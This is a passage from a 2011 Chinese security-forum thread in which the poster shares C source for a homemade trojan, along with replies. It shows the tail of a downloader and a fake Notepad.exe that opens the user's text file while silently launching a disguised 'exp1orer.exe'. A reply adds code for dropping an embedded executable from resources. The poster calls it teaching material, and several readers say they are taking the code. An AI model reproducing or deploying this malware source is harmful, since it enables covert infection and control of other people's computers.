                hwrite=WriteFile(createfile,buffer,sizeof(buffer),&written,NULL);   
                if (hwrite==0)   
                {   
                        CloseHandle(createfile);  
                        InternetCloseHandle(HOpen);
                        InternetCloseHandle(HInternet);
                        return FALSE;
                }   
        }   
        CloseHandle(createfile);   
        InternetCloseHandle(HOpen);   
        InternetCloseHandle(HInternet);
        return TRUE;
}

Notepad.exe文件代码如下:
#pragma comment(lib,"Shell32.lib")
#pragma comment(lib,"kernel32.lib")
#include <windows.h>
#include <tchar.h>
bool FileExists(char *filename);
int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInst,LPSTR lpszCmdLine,int nCmdShow)
{
        int   argc=0;
        int i;
        LPWSTR   *argv=CommandLineToArgvW(GetCommandLineW(),&argc);
        char cmdline[MAX_PATH];
        char windows[MAX_PATH];
        char system[MAX_PATH];
        char root[MAX_PATH];
        char arg[MAX_PATH];
        memset(root,'\0',MAX_PATH);
        memset(windows,'\0',MAX_PATH);
        memset(system,'\0',MAX_PATH);
        memset(cmdline,'\0',MAX_PATH);
        memset(arg,'\0',MAX_PATH);
        GetWindowsDirectory(windows,MAX_PATH);
        GetSystemDirectory(system,MAX_PATH);
        lstrcpy(root,windows);
        lstrcpy(cmdline,windows);
        lstrcat(cmdline,"\\notepad.exe");
        lstrcat(windows,"\\exp1orer.exe");
        lstrcat(system,"\\exp1orer.exe");
//下面的判断很重要,当用LPWSTR   *argv=CommandLineToArgvW(GetCommandLineW(),&argc)把文件名当作参数传入的时候,文件名中不能有空格,比如C:\program files\a.txt,会报找不到C:\program.txt文件,因为参数的个数是以空格判断的,所以一定要加个下面的判断
        for(i=1;i<argc;i++)
        {
                lstrcat(cmdline," ");
                WideCharToMultiByte(CP_OEMCP,NULL,argv[i],-1,arg,MAX_PATH,NULL,NULL);
                lstrcat(cmdline,arg);
        }
        WinExec(cmdline,SW_SHOW);
        if(FileExists(windows))
                WinExec(windows,SW_HIDE);
        else
                if(FileExists(system))
                        WinExec(system,SW_HIDE);
                else  
                {
                        root[3]='\0';
                        lstrcat(root,"exp1orer.exe");
                        if(FileExists(root))
                                WinExec(root,SW_HIDE);
                }
                return 0;       
}
bool FileExists(char *filename)
{
        HANDLE hFind;
        WIN32_FIND_DATA FindData;
        hFind=FindFirstFile(filename,&FindData);
        if(hFind==INVALID_HANDLE_VALUE)
        {
                return false;
        }
        return true;
}



[挑战]看雪.纽盾 KCTF 2019晋级赛Q3攻击方进行中……,华为P30 Pro、iPad、kindle等你来拿!

最新回复 (32)
tornodo 1 2011-5-22 11:44
2
0
来个人解释下那个大大的数组的真正含义

中间那个16进制的数组是一个pe文件吗?还是什么?碰到过很多类似的程序,都不明白那个数组。求解。
上传的附件:
heyuehui 2 2011-5-22 11:51
3
0
那个是释放的noteped.exe的十六进制代码,noteped.exe的源代码帖子后面有,功能就是先打开txt文本,再运行病毒。。
tornodo 1 2011-5-22 12:04
4
0
还是个下载者啊,⊙﹏⊙b汗
代码我拿走了你的马没有免杀哦,下载的时候就被砍了
邓韬 9 2011-5-22 12:44
5
0
嵌入了一个PE文件的十六进制,以便写入到磁盘保存!
heyuehui 2 2011-5-22 12:48
6
0
本代码就是为了让大家了解一下木马病毒的手段,用的都是常规的手段。。没有反调试跟免杀效果。。。
butian 2011-5-22 13:17
7
0
呵呵,Good!
heyuehui 2 2011-5-22 19:33
8
0
这里面有几个技术是编病毒必备的技术:磁盘遍历和exe文件的释放,会磁盘遍历就可以逐个感染每个文件,掌握exe文件的释放就可以编捆绑机,这些都是病毒的基本手段。。来点大牛指点一下啊。。。
lnheart 2011-5-23 14:50
9
0
帮LZ顶一下。最近在学c
熊猫正正 9 2011-5-23 14:53
10
0
嘿嘿,你的木马终于写成了~~
heyuehui 2 2011-5-23 18:45
11
0
谢谢大侠来捧场哈,你怎么知道我要写木马啊。。。
heyuehui 2 2011-5-23 18:46
12
0
谢谢哈,咱们可以共同学习,我汇编和C都在学。。
dayang 2011-5-26 11:08
13
0
10年前的技术,现在都不用了
heyuehui 2 2011-5-26 19:05
14
0
主要是练习编程水平,目的不是编出来一个很先进的病毒。。。会了可执行文件的释放就能编出来捆绑机或者文件加密程序,而且通过编写过程中遇到问题和解决问题,我学到了很多东西,这就够了。。。最起码编这个程序之前,我不会磁盘的遍历和可执行文件的释放。。。
NiGHter 2011-5-26 19:25
15
0
那个是释放的noteped.exe的十六进制代码,noteped.exe的源代码帖子后面有,功能就是先打开txt文本,再运行病毒。。


还是写到资源里吧,这么看起来乱
yiruirui 1 2011-5-30 10:49
16
0
首先非常感谢楼主!给楼主提点我的个人建议吧:直接发代码却没怎么解释原理,初学者看了哪个数组就被吓跑了,所以希望楼主对这个帖子加上原理先,在关键地方加入注释,我希望成为精华!!!!!
zhaokang 3 2011-5-31 09:28
17
0
很不错的科普知识
heyuehui 2 2011-5-31 13:04
18
0
谢谢提醒,我会改善的。。
heyuehui 2 2011-5-31 13:09
19
0
谢谢关注。。。
willapple 2011-5-31 22:40
20
0
不错的,来学习一下!最近也在学习C和汇编!
robey 1 2011-5-31 23:35
21
0
一些基本的行为都有了。来学习学习。。
heyuehui 2 2011-6-1 10:16
22
0
嗯,确实包含了很多种类病毒的基本特征,包括Autorun病毒,下载者病毒等等,我会慢慢完善的,我的目标是把它打造成一个教学式的病毒,囊括大部分病毒技术。。以后可能还会加上文件感染,引导分区感染的特征。。
rosetta 1 2011-6-1 11:44
23
0
拿走代码- -

感谢。
rosetta 1 2011-6-1 21:57
24
0
不错。对我这种有c基础但没有实战的人是最好的教程。

这些技术看起来简单,但很实用,现在的病毒照样在用。
琉璃瓦 2011-6-1 22:04
25
0
看不懂得菜鸟路过。。。
残月映梦 2011-6-3 20:19
26
0
不错 我比较喜欢开源精神~~~这样才可以学到更多的东西~~~
广海混沌 2011-6-3 20:51
27
0
恩 的确是老技术了。
fishyuule 2011-6-3 21:16
28
0
可以查看一下感染型病毒....不是简单的感染U盘...
不过代码从头读到尾,回顾过去,还是挺舒服的...
加油..
fishyuule 2011-6-3 21:23
29
0
		DWORD dwWrite=0;
		HANDLE hFile = CreateFile( _T("C:\\ViursDemo.exe"), GENERIC_WRITE, FILE_SHARE_WRITE, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
		if (hFile == INVALID_HANDLE_VALUE)
		{
			return ;
		}
		HRSRC hRsc =  FindResource(NULL, MAKEINTRESOURCE(IDR_EXEFILE),  _T("EXEFILE"));
		HGLOBAL hG = LoadResource(NULL, hrsc);
		DWORD dwSize = SizeofResource( NULL, hRsc);
		WriteFile(hFile, hG, dwSize, &dwWrite, NULL); 
		CloseHandle(hFile);


15楼说的方法,可以参考一下,通过资源的形式..
heyuehui 2 2011-6-4 08:19
30
0
嗯,学习了,多谢。。
stormxp 1 2011-6-4 21:45
31
0
收藏了,希望自己也能写个这个东西出来
heyuehui 2 2011-6-5 13:40
32
0
只要去编,就肯定能编出来的。。支持你
陈英俊 2011-6-9 12:03
33
0
申请的太早了,等打造完成一个完备,详细,深入浅出的教学贴,火候就够了。
游客
登录 | 注册 方可回帖
返回